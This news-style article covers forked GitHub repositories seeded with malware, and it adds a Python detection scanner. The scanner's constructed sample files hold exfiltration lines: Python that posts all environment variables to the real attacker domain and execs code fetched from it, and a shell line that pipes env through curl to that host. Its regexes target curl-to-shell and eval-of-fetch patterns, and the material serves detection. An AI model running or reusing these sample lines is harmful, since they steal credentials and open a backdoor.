Malware Spreading Through Cloned GitHub Repositories
Developer Stephen Lacy caused a stir in the tech community when he announced on Twitter that he had discovered a “large-scale malware attack” on GitHub, affecting around 35,000 repositories. However, it turned out that there was no actual compromise or hack: the repositories in question were forks (copies) of other projects, intentionally created to spread malware.
Lacy’s original tweet alarmed many, as it claimed that 35,000 repositories were infected with malware, spanning project categories such as crypto, Go, Python, JavaScript, Bash, Docker, and Kubernetes. Unfortunately, many people didn’t read beyond the initial message, but Lacy later clarified the situation in a follow-up thread.
How the Attack Worked
While forking repositories is a common and encouraged practice among developers, in this case the attackers created copies of legitimate projects and injected them with malicious code. Their goal was to target unsuspecting developers who might find one of the copies (for example, through a search engine) and use it in place of the genuine upstream project.
The issue came to light when Lacy was reviewing an open-source project he found via Google and noticed the following URL in the code: hxxp://ovz1.j19544519.pr46m.vps.myjino[.]ru. A search on GitHub revealed that this URL appeared in over 35,000 files across various repositories.
Clarifying the Numbers
According to journalists at Bleeping Computer, the 35,000 figure refers to the number of suspicious files, not infected repositories. For example, out of 35,788 search results, more than 13,000 came from a single repository—redhat-operator-ecosystem. So, Lacy’s initial estimate was somewhat inaccurate.
What the Malicious Code Did
After Lacy’s report, many experts began investigating. James Tucker, for instance, found that the cloned repositories containing the malicious URL were collecting the user’s environment variables and sending them to the attacker, and also included a one-line backdoor. Because environment variables commonly hold API keys, tokens, Amazon AWS credentials, and cryptographic keys, this let the attackers harvest those secrets from anyone who ran the code, and the backdoor allowed them to execute arbitrary code on infected systems.
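The article does not reproduce the injected code itself, so the following is an added example written for this page, not code from the attack or from any of the researchers named here. It scans source files for the three things the paragraph above describes: the indicator domain quoted in the article, code that reads the environment and also makes an outbound request (the exfiltration pattern), and code that executes what it fetches (the one-line backdoor pattern). The sample files are constructed approximations of those patterns, used only as scanner input and never executed; the regular expressions and the `scan_text`/`scan_tree` names are this example’s own.

```python
"""Scan source files for the indicators described in the article.

Added example, not the article's or the researchers' code. The sample
inputs below are constructed; they imitate the described pattern and are
only ever read as text, never run.
"""
import os
import re

# Host quoted in the article, re-fanged so it matches real source text.
IOC_HOST = "ovz1.j19544519.pr46m.vps.myjino.ru"

# Access to the process environment in Python, Node or shell.
ENV_ACCESS = re.compile(r"\bos\.environ\b|\bprocess\.env\b|\benv\b\s*\||\bprintenv\b")
# Outbound network call in the same file.
NET_CALL = re.compile(r"\brequests\.(post|get)\b|\burlopen\b|\bcurl\b|\bwget\b|\bfetch\(")
# Executing fetched content: exec/eval of a response, $(curl ...), or curl | sh.
REMOTE_EXEC = re.compile(
    r"\b(exec|eval)\s*\(.*(requests\.get|urlopen|fetch\()"
    r"|\$\(\s*(curl|wget)\b"
    r"|\b(curl|wget)\b[^\n|]*\|\s*(ba)?sh\b"
)

SCAN_EXTENSIONS = (".py", ".js", ".sh", ".go", ".rb", ".ts")


def scan_text(text: str) -> list[str]:
    """Return the list of indicator names found in one file's contents."""
    findings = []
    if IOC_HOST in text:
        findings.append("ioc-domain")
    # Environment access on its own is normal; combined with a network
    # call in the same file it matches the exfiltration pattern.
    if ENV_ACCESS.search(text) and NET_CALL.search(text):
        findings.append("env-exfiltration")
    if REMOTE_EXEC.search(text):
        findings.append("remote-code-execution")
    return findings


def scan_tree(root: str) -> dict[str, list[str]]:
    """Walk a checked-out repository and report files with any finding."""
    report = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d != ".git"]
        for name in filenames:
            if not name.endswith(SCAN_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings = scan_text(fh.read())
            if findings:
                report[os.path.relpath(path, root)] = findings
    return report


# Constructed samples (not real repository contents).
SAMPLES = {
    # Python: posts the whole environment, then executes fetched code.
    "setup_helper.py": (
        "import os, requests\n"
        f"requests.post('http://{IOC_HOST}/', data=dict(os.environ))\n"
        f"exec(requests.get('http://{IOC_HOST}/x').text)\n"
    ),
    # Shell: pipes the environment to the same host.
    "build.sh": (
        "#!/bin/sh\n"
        f"env | curl -s -X POST --data-binary @- http://{IOC_HOST}/\n"
    ),
    # Benign: reads one variable, makes no network call.
    "config.py": (
        "import os, logging\n"
        "logging.info('home is %s', os.environ.get('HOME'))\n"
    ),
}


def scan_samples() -> dict[str, list[str]]:
    """Run scan_text over the constructed samples; benign files are omitted."""
    return {name: f for name, text in SAMPLES.items() if (f := scan_text(text))}


if __name__ == "__main__":
    for name, findings in scan_samples().items():
        print(f"{name}: {', '.join(findings)}")
```

The two heuristic rules will produce false positives on legitimate code (a deployment script that reads `os.environ` and calls `requests.post` looks the same to a regex), so treat `env-exfiltration` and `remote-code-execution` as triage prompts; only the `ioc-domain` hit is a definite indicator.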
Timeline and Response
Bleeping Computer noted that most of the cloned repositories appeared within the last month (between six and twenty days prior), but some repositories carry malicious commits dated as far back as 2015, suggesting that those repositories may themselves have been compromised rather than cloned. Note, however, that git commit dates are supplied by whoever makes the commit and can be set to any value, so an old commit date alone does not establish when the malicious code was actually introduced.
More recent commits containing the malicious URL are mostly from security researchers, including threat analyst Florian Roth, who created Sigma rules to detect the malicious code. Unfortunately, some GitHub users misunderstood the situation and mistakenly reported the Sigma repository as malicious.
According to Lacy and journalists, GitHub had removed nearly all of the malicious cloned repositories from its platform within a few hours of the report.